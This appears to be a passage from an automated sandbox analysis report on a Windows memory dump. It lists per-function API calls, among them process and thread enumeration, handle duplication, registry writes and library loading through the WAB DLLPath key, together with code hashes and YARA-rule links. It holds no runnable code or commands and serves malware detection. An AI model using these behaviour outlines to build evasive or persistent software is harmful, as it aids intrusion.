                                                            • API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
                                                            • String ID:
                                                            • API String ID: 2341152533-0
                                                            • Opcode ID: c5de6d4fb91aebe13a07e72314e45ef94a1cc23a11179e6747a7d8b74e11131d
                                                            • Instruction ID: 50714ac238aa7bd82a321c4761c6f922ddca94252382879fd338cd33d1c20463
                                                            • Opcode Fuzzy Hash: c5de6d4fb91aebe13a07e72314e45ef94a1cc23a11179e6747a7d8b74e11131d
                                                            • Instruction Fuzzy Hash: 222159B2900108AFDF10AFA0DCC8DEE7BB9EB0C355B044566FA05E7150DB75AD559BB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA91D3, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87registrylibraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 04BA91EE
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 04BA92A6
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • LoadLibraryA.KERNEL32(00000000,?,?,?,?), ref: 04BA923C
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BA9255
                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 04BA9274
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,?), ref: 04BA9286
                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 04BA928E
                                                            Strings
                                                            • Software\Microsoft\WAB\DLLPath, xrefs: 04BA91DF
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
                                                            • String ID: Software\Microsoft\WAB\DLLPath
                                                            • API String ID: 1628847533-3156921957
                                                            • Opcode ID: 0c300e6844e007e60ccbfe30c63104daa48c423a291191015bc1c740441b8d71
                                                            • Instruction ID: 761361cb3e7028f5fdcdd341a80bcf85bfffdbccea9ba853c98e9082fd860815
                                                            • Opcode Fuzzy Hash: 0c300e6844e007e60ccbfe30c63104daa48c423a291191015bc1c740441b8d71
                                                            • Instruction Fuzzy Hash: CF21AC71904218FFCF216FA5DCC8CAEBBBCEB48355B1445A6F811E3110D6316E10EB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BC2F05, Relevance: 13.6, APIs: 9, Instructions: 130memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BB4211: RtlEnterCriticalSection.NTDLL(04BCC328), ref: 04BB4219
                                                              • Part of subcall function 04BB4211: RtlLeaveCriticalSection.NTDLL(04BCC328), ref: 04BB422E
                                                              • Part of subcall function 04BB4211: InterlockedIncrement.KERNEL32(0000001C), ref: 04BB4247
                                                            • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 04BC2F42
                                                            • memset.NTDLL ref: 04BC2F53
                                                            • lstrcmpi.KERNEL32(?,?), ref: 04BC2F93
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BC2FBF
                                                            • memcpy.NTDLL(00000000,?,?), ref: 04BC2FD3
                                                            • memset.NTDLL ref: 04BC2FE0
                                                            • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 04BC2FF9
                                                            • memcpy.NTDLL(-00000005,?,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 04BC301C
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04BC3039
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
                                                            • String ID:
                                                            • API String ID: 694413484-0
                                                            • Opcode ID: 9f29382ef2052f80ba7890fa60274a099f30198e15526a0b4c87577d360358ff
                                                            • Instruction ID: 71687e130d8e18b41c7160f7c702b763ce1ff07100ea0bb33fcc7e6f00aecca1
                                                            • Opcode Fuzzy Hash: 9f29382ef2052f80ba7890fa60274a099f30198e15526a0b4c87577d360358ff
                                                            • Instruction Fuzzy Hash: 71419372E00209EFDB109FA4CCC4F9DBBB5FB08318F1480A9E915A7250D775AE45DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBDFE6, Relevance: 13.6, APIs: 9, Instructions: 110stringmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(00000000,00000008,00000008,?,?,?), ref: 04BBDFFD
                                                            • lstrlen.KERNEL32(?,?,?), ref: 04BBE005
                                                            • lstrlen.KERNEL32(00000001,?,?), ref: 04BBE070
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BBE09B
                                                            • memcpy.NTDLL(00000000,00000002,?,?,?), ref: 04BBE0AC
                                                            • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?), ref: 04BBE0C2
                                                            • memcpy.NTDLL(00000000,00000001,00000001,00000000,00000000,00000000,?,?,?,?,?), ref: 04BBE0D4
                                                            • memcpy.NTDLL(00000000,04BC63D8,00000002,00000000,00000001,00000001,00000000,00000000,00000000,?,?,?,?,?), ref: 04BBE0E7
                                                            • memcpy.NTDLL(00000000,?,00000002,?,?,?,?,?), ref: 04BBE0FC
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: memcpy$lstrlen$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 3386453358-0
                                                            • Opcode ID: e9b90265c3894a115ee47153125424462764821f6ba164595d9eb74341f10291
                                                            • Instruction ID: febc0693b01d6c2de4bfef3b5a32a65f686946d93eca90de5df0de3dfdaff99d
                                                            • Opcode Fuzzy Hash: e9b90265c3894a115ee47153125424462764821f6ba164595d9eb74341f10291
                                                            • Instruction Fuzzy Hash: D6414D71D00219EFCF00DFA8CC81AEEBBB5EF58254F144096E955A7211E771EA54DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BC0EB9, Relevance: 13.6, APIs: 9, Instructions: 109memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BB4211: RtlEnterCriticalSection.NTDLL(04BCC328), ref: 04BB4219
                                                              • Part of subcall function 04BB4211: RtlLeaveCriticalSection.NTDLL(04BCC328), ref: 04BB422E
                                                              • Part of subcall function 04BB4211: InterlockedIncrement.KERNEL32(0000001C), ref: 04BB4247
                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 04BC0F0A
                                                            • lstrlen.KERNEL32(00000008,?,?,?,04BA3273,?,00000000,73B76900,00000000), ref: 04BC0F19
                                                            • RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 04BC0F2B
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,04BA3273,?,00000000,73B76900,00000000), ref: 04BC0F3B
                                                            • memcpy.NTDLL(00000000,?,?,?,?,?,04BA3273,?,00000000,73B76900,00000000), ref: 04BC0F4D
                                                            • lstrcpy.KERNEL32 ref: 04BC0F7F
                                                            • RtlEnterCriticalSection.NTDLL(04BCC328), ref: 04BC0F8B
                                                            • RtlLeaveCriticalSection.NTDLL(04BCC328), ref: 04BC0FE3
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
                                                            • String ID:
                                                            • API String ID: 3746371830-0
                                                            • Opcode ID: ab428e650c308ce2680c1f885b8a4a989b26a60199e9a35717f6803f582a2d70
                                                            • Instruction ID: 0b8de761bd922b3f595e6b02178ee6ec01d40b17705caaaa0e40d9c73c4ddd81
                                                            • Opcode Fuzzy Hash: ab428e650c308ce2680c1f885b8a4a989b26a60199e9a35717f6803f582a2d70
                                                            • Instruction Fuzzy Hash: 4C416871500709EFDB21AFA8D8C4B6A7BF8FB58315F10849EE85997240D778E990DFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB605B, Relevance: 13.6, APIs: 9, Instructions: 105memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BB9F80: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04BB9FB2
                                                              • Part of subcall function 04BB9F80: HeapFree.KERNEL32(00000000,00000000,?,?,04BA8FA2,?,00000022,?,?,?,?,?,?,?,?,?), ref: 04BB9FD7
                                                              • Part of subcall function 04BBDF48: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,04BB6098,?,?,?,?,00000022,00000000,00000000,00000000), ref: 04BBDF84
                                                              • Part of subcall function 04BBDF48: HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,04BB6098,?,?,?,?,00000022,00000000,00000000,00000000), ref: 04BBDFD7
                                                            • lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,?,?,00000022,00000000,00000000,00000000), ref: 04BB60CD
                                                            • lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,?,?,00000022,00000000,00000000,00000000), ref: 04BB60D5
                                                            • lstrlen.KERNEL32(?), ref: 04BB60DF
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BB60F4
                                                            • wsprintfA.USER32 ref: 04BB6130
                                                            • HeapFree.KERNEL32(00000000,00000000,0000002D,00000000,00000000,00000000), ref: 04BB614F
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04BB6164
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04BB6171
                                                            • HeapFree.KERNEL32(00000000,00000000,?,0000001C,?,?,?,?,00000022,00000000,00000000,00000000), ref: 04BB617F
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$lstrlen$Allocate$wsprintf
                                                            • String ID:
                                                            • API String ID: 168057987-0
                                                            • Opcode ID: 0d77627d58c9dde09b0ccfd89a9f5846a359adf7f7f0d8376645d8f30ca04b3e
                                                            • Instruction ID: ea58b3c613fa79949601b501d7ef5486842a52358c379374b948c652dcb9b420
                                                            • Opcode Fuzzy Hash: 0d77627d58c9dde09b0ccfd89a9f5846a359adf7f7f0d8376645d8f30ca04b3e
                                                            • Instruction Fuzzy Hash: 67319271604315ABDB21AF65DC81EAFBBE8EF88314F01056AF584E2251D7B4EC14CBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BAFF29, Relevance: 13.6, APIs: 9, Instructions: 82fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,04BB428F,00000008,?,00000010,00000001,00000000,0000003A), ref: 04BAFF48
                                                            • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 04BAFF7C
                                                            • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 04BAFF84
                                                            • GetLastError.KERNEL32 ref: 04BAFF8E
                                                            • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 04BAFFAA
                                                            • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 04BAFFC3
                                                            • CancelIo.KERNEL32(?), ref: 04BAFFD8
                                                            • CloseHandle.KERNEL32(?), ref: 04BAFFE8
                                                            • GetLastError.KERNEL32 ref: 04BAFFF0
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
                                                            • String ID:
                                                            • API String ID: 4263211335-0
                                                            • Opcode ID: 8e413c3342ad7d36f9fd8f1e0dd85e107e5659ffd18a1f882a62bb179472bb26
                                                            • Instruction ID: 10fae979c1978f1a2c98cc8649df6154031369c129ae70670c487e2a91bd4193
                                                            • Opcode Fuzzy Hash: 8e413c3342ad7d36f9fd8f1e0dd85e107e5659ffd18a1f882a62bb179472bb26
                                                            • Instruction Fuzzy Hash: 4D213972A05118BFCB109FA9D888CEE7B7AEF49351F008066F906E7141D735AA61CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB81D1, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,04BB2283,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BB81DD
                                                            • _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 04BB81F3
                                                            • _snwprintf.NTDLL ref: 04BB8218
                                                            • CreateFileMappingW.KERNEL32(000000FF,04BCC1A8,00000004,00000000,00001000,?), ref: 04BB8234
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 04BB8246
                                                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 04BB825D
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 04BB827E
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 04BB8286
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                            • String ID:
                                                            • API String ID: 1814172918-0
                                                            • Opcode ID: 2f418bb0a9a2093e63e664ab4794e58f59f7f53ae6d7f7bdd67d095fd188e49c
                                                            • Instruction ID: 2b6f1768b52a58243fd1af8a136fbbff9a20812f4d96289479f5ee5d3a26d535
                                                            • Opcode Fuzzy Hash: 2f418bb0a9a2093e63e664ab4794e58f59f7f53ae6d7f7bdd67d095fd188e49c
                                                            • Instruction Fuzzy Hash: 5021D576640208BBDB11ABA4DC85FD977BDEF48751F254061FA05F71C0E6B0E9048BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB6FE4, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 190stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 04BB70E2
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 04BB7105
                                                            • lstrcatW.KERNEL32(00000000,00000000), ref: 04BB710D
                                                            • lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 04BB7158
                                                            • memcpy.NTDLL(00000000,?,00000008,00000006), ref: 04BB71C0
                                                            • LocalFree.KERNEL32(?,00000006), ref: 04BB71D7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
                                                            • String ID: P
                                                            • API String ID: 3649579052-3110715001
                                                            • Opcode ID: b2ac3232e18097c32a7262eb5b9a382bf6f05b87da63785afbfe2853cd67fab6
                                                            • Instruction ID: 253a1cf08de7f9da3aac01875a55ab4aab64b58b3120b3316fc117ea571e8242
                                                            • Opcode Fuzzy Hash: b2ac3232e18097c32a7262eb5b9a382bf6f05b87da63785afbfe2853cd67fab6
                                                            • Instruction Fuzzy Hash: 4361397190020EAFDF119FA5DCC4DFE7BB8EB48308F098066F945A7211DA75EA15CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB0E2E, Relevance: 12.1, APIs: 8, Instructions: 123memoryregistrysynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BC1736: RegCreateKeyA.ADVAPI32(80000001,05C8A7F0,?), ref: 04BC174B
                                                              • Part of subcall function 04BC1736: lstrlen.KERNEL32(05C8A7F0,00000000,00000000,00000000,?,04BB68CE,00000000,00000000,00000001,73B74D40,04BB5AB0,04BB5AB0,?,04BA74AD,?,04BB5AB0), ref: 04BC1774
                                                            • RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 04BB0E73
                                                            • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 04BB0E8B
                                                            • HeapFree.KERNEL32(00000000,?,?,00000000,04BB2333,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BB0EED
                                                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04BB0F01
                                                            • WaitForSingleObject.KERNEL32(00000000,?,00000000,04BB2333,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BB0F53
                                                            • HeapFree.KERNEL32(00000000,?,?,00000000,04BB2333,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BB0F7C
                                                            • HeapFree.KERNEL32(00000000,04BB2333,?,00000000,04BB2333,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BB0F8C
                                                            • RegCloseKey.ADVAPI32(00000000,?,00000000,04BB2333,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BB0F95
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
                                                            • String ID:
                                                            • API String ID: 3503961013-0
                                                            • Opcode ID: 6925e5d6573a3361bd7910ad1a40771db6b3d95646395a62ec16f76d5cc05be8
                                                            • Instruction ID: d19a96694323928d063da027ebf16cee2e56e603f8c2e2fe01685c24ea5ce897
                                                            • Opcode Fuzzy Hash: 6925e5d6573a3361bd7910ad1a40771db6b3d95646395a62ec16f76d5cc05be8
                                                            • Instruction Fuzzy Hash: 5341B2B1D00209EFDF119F95DC848FEBBB9FB08345F1084AAE554A2210D379AE95DFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BAF895, Relevance: 12.1, APIs: 8, Instructions: 112memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • StrChrA.SHLWAPI(00000000,0000002C,7656D3B0,00000000,00000000,04BB5ADA), ref: 04BAF8C6
                                                            • StrChrA.SHLWAPI(00000001,0000002C), ref: 04BAF8D9
                                                            • StrTrimA.SHLWAPI(00000000,?), ref: 04BAF8FC
                                                            • StrTrimA.SHLWAPI(00000001,?), ref: 04BAF90B
                                                            • lstrlen.KERNEL32(00000000), ref: 04BAF940
                                                            • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 04BAF953
                                                            • lstrcpy.KERNEL32(00000004,00000000), ref: 04BAF971
                                                            • HeapFree.KERNEL32(00000000,00000000,00000001,00000000,-00000005,00000001), ref: 04BAF995
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: HeapTrim$AllocateFreelstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 1974185407-0
                                                            • Opcode ID: d4131acb9f9fdad145f8d4eb9612b3136a337f83e04437767b2d359c1e6cf65a
                                                            • Instruction ID: b3f62170dc5c1c8729582578c3ca44dfa471c52117b365ce65ac4f0ae7047fc3
                                                            • Opcode Fuzzy Hash: d4131acb9f9fdad145f8d4eb9612b3136a337f83e04437767b2d359c1e6cf65a
                                                            • Instruction Fuzzy Hash: FF317A31904208FFDB21DFA9D885EAE7FB8EF18744F154097E948A7240E778E950CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BAC12C, Relevance: 12.1, APIs: 8, Instructions: 112stringtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 04BAC142
                                                            • wsprintfA.USER32 ref: 04BAC16A
                                                            • lstrlen.KERNEL32(00000008), ref: 04BAC179
                                                              • Part of subcall function 04BC3C4A: RtlFreeHeap.NTDLL(00000000,?,04BA30B5,00000000,?,00000104,04BC0BF9,?,00000250,?,00000000), ref: 04BC3C56
                                                            • wsprintfA.USER32 ref: 04BAC1B9
                                                            • wsprintfA.USER32 ref: 04BAC1EE
                                                            • memcpy.NTDLL(00000000,?,?), ref: 04BAC1FB
                                                            • memcpy.NTDLL(00000008,04BC63D8,00000002,00000000,?,?), ref: 04BAC210
                                                            • wsprintfA.USER32 ref: 04BAC233
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
                                                            • String ID:
                                                            • API String ID: 2937943280-0
                                                            • Opcode ID: d108c353fd89db014c81e45d710c5a1b169ff09aacf2fb5ccaf6b86c29b94c2d
                                                            • Instruction ID: 2257eb5c9f988202bd2164125677131241ec8a1de160c936984835a540d39ecd
                                                            • Opcode Fuzzy Hash: d108c353fd89db014c81e45d710c5a1b169ff09aacf2fb5ccaf6b86c29b94c2d
                                                            • Instruction Fuzzy Hash: B6411175A04209EFDB00DF99D8C4EAEB7FCEF48308B154469E919D7211E634FE158B60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBBDCC, Relevance: 12.1, APIs: 8, Instructions: 72memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,04BBA2FF,?,?,?,?), ref: 04BBBDF0
                                                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04BBBE02
                                                            • wcstombs.NTDLL ref: 04BBBE10
                                                            • lstrlen.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,04BBA2FF,?,?,?,?,?), ref: 04BBBE34
                                                            • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 04BBBE49
                                                            • mbstowcs.NTDLL ref: 04BBBE56
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,04BBA2FF,?,?,?,?,?), ref: 04BBBE68
                                                            • HeapFree.KERNEL32(00000000,00000000,00000001,00000001,?,04BBA2FF,?,?,?,?,?), ref: 04BBBE82
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
                                                            • String ID:
                                                            • API String ID: 316328430-0
                                                            • Opcode ID: d04d13745823d84f1279c8b84a05173a7207cd144b78e9cc49a410c808a1ec4d
                                                            • Instruction ID: d26fd39e0c2dfc5cac2ceeca13837fc1423beb59de5f2c2b34ea972f8ad988c9
                                                            • Opcode Fuzzy Hash: d04d13745823d84f1279c8b84a05173a7207cd144b78e9cc49a410c808a1ec4d
                                                            • Instruction Fuzzy Hash: 5F216A7150020AFFCF108FA1EC89FAE7BB9EB48305F104466FA00A6160D775E961DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB69E9, Relevance: 12.1, APIs: 8, Instructions: 52registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OpenProcess.KERNEL32(00000040,00000000,?), ref: 04BB69F5
                                                            • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 04BB6A13
                                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04BB6A1B
                                                            • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 04BB6A39
                                                            • GetLastError.KERNEL32 ref: 04BB6A4D
                                                            • RegCloseKey.ADVAPI32(?), ref: 04BB6A58
                                                            • CloseHandle.KERNEL32(00000000), ref: 04BB6A5F
                                                            • GetLastError.KERNEL32 ref: 04BB6A67
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
                                                            • String ID:
                                                            • API String ID: 3822162776-0
                                                            • Opcode ID: f3848d41ef01875acf247eeea2614578e086b8ae1082e1804503cc1175e40270
                                                            • Instruction ID: b4e2024303e6c385ea7e1813819f519aa97b4ad6fcb1c0f8301f475cd924cf42
                                                            • Opcode Fuzzy Hash: f3848d41ef01875acf247eeea2614578e086b8ae1082e1804503cc1175e40270
                                                            • Instruction Fuzzy Hash: 46111E75240108EFDF019F60EC88FA93B79EB48351F008026FA56D6250DB75ED21DBB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BAD515, Relevance: 11.5, APIs: 9, Instructions: 269COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 9fe1e46813c4424fc94c1d1f68d03d7e66169a8997b3f9fd19be636c3d3ed8e8
                                                            • Instruction ID: b1463fc6f991e7d86e1d12c1e0f972a9ae50a0206509d6dd923636cc6ea61a94
                                                            • Opcode Fuzzy Hash: 9fe1e46813c4424fc94c1d1f68d03d7e66169a8997b3f9fd19be636c3d3ed8e8
                                                            • Instruction Fuzzy Hash: 9EA10575D04209EFEF269FA8CC44AFEBBBAFF04308F0440A9E551A2460D771AA65DF10
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BC17B2, Relevance: 10.6, APIs: 7, Instructions: 137memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • StrChrA.SHLWAPI(00000000,00000020,00000000), ref: 04BC17DD
                                                            • StrTrimA.SHLWAPI(00000000,?), ref: 04BC17FA
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04BC182D
                                                            • RtlImageNtHeader.NTDLL(00000000), ref: 04BC1858
                                                            • HeapFree.KERNEL32(00000000,00000000,00000007,00000001,00000000,00000000), ref: 04BC191A
                                                              • Part of subcall function 04BBBAE4: lstrlen.KERNEL32(?,7656D3B0,00000000,00000000,04BB4A41,00000000,00000001,00000000,73B74D40,?,?,04BB5ADA,00000000,00000000), ref: 04BBBAED
                                                              • Part of subcall function 04BBBAE4: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BBBB10
                                                              • Part of subcall function 04BBBAE4: memset.NTDLL ref: 04BBBB1F
                                                            • lstrlen.KERNEL32(00000000,00000000,0000014C,00000000,00000000), ref: 04BC18CB
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,0000014C,00000000,00000000), ref: 04BC18FA
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: FreeHeap$lstrlen$HeaderImageTrimmemcpymemset
                                                            • String ID:
                                                            • API String ID: 239510280-0
                                                            • Opcode ID: 663b16b0ba1b56c2e798bcdad32c0e654d9d84a3e0a8298e73b1e56cf9e3a583
                                                            • Instruction ID: cd1ea25d45b3b59ed1aa4ec9c0dc0b19b272906a46bb783ed91ad9c0a89785eb
                                                            • Opcode Fuzzy Hash: 663b16b0ba1b56c2e798bcdad32c0e654d9d84a3e0a8298e73b1e56cf9e3a583
                                                            • Instruction Fuzzy Hash: 0641D935604205FBEB125B68DCC4FAE7BB8EF58705F1000AAF605B7181EBB5AD41DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB511F, Relevance: 10.6, APIs: 7, Instructions: 123registrymemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlImageNtHeader.NTDLL ref: 04BB5148
                                                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 04BB518B
                                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04BB51A6
                                                            • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?), ref: 04BB51FC
                                                            • HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,?), ref: 04BB5257
                                                            • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 04BB5265
                                                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 04BB5270
                                                              • Part of subcall function 04BAC547: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 04BAC55B
                                                              • Part of subcall function 04BAC547: memcpy.NTDLL(00000000,04BAF989,?,?,-00000005,?,04BAF989,00000001,00000000,-00000005,00000001), ref: 04BAC584
                                                              • Part of subcall function 04BAC547: RegCloseKey.ADVAPI32(?,?,04BAF989,00000001,00000000,-00000005,00000001), ref: 04BAC5D8
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenmemcpy
                                                            • String ID:
                                                            • API String ID: 2070110485-0
